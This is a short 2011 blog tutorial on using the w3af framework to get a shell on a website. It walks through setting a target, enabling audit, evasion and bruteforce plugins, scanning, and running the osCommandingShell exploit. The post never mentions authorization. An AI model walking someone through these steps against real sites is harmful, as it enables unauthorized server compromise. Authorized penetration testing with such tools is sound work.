Thursday, September 29, 2011

Getting Shell of a website by W3af

Hello everyone, you all know about Metasploit and use it to exploit the targets. Good good...but do you know about w3af ( Web Application Attack and Audit Framework) by Rapid7. Yes, It is also developed by Rapid 7 which is a famous security firm and developed Metasploit. It is not bigger than metasploit, but it is more powerful than the other web testing tools. OK now introduction is over. We proceed to the practical.

Requisites: Python and w3af

Step 1: Open the console and type:
           target
           set target www.site.com



Step 2: Now type:
            plugins

Step 3: Now we'll look for available plugins to enable them by typing:
            help



Step 4: First category we chose is audit , so we'll type:
            audit



Step 5: Now we'll chose the plugin from category "audit". Type:
            audit "name of plugin"  (as mentioned in the picture)


You can chose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....

Step 6: If you saw any plugin with config option marked as "YES" then to configure it type:
           audit config <plugin>



Step 7: Now type:
            back

Step 8: Chose another category: (if you want)
            evasion or bruteforce or anyone

Step 9: Now we are ready with our values, to start the scanning type:
            start scan





Step 10: After finishing the scan, we'll have to exploit the target. So type:
              Exploit

Step 11: Again type:
              Exploit osCommandingShell





Step 12: If everything goes right, we'll get the shell of the server, type:
              interact 0 (zero)

Step 13:  Hey, You got the shell, no more steps...!!! :P


Write to me for cheat sheet. :)
 

The Hacker News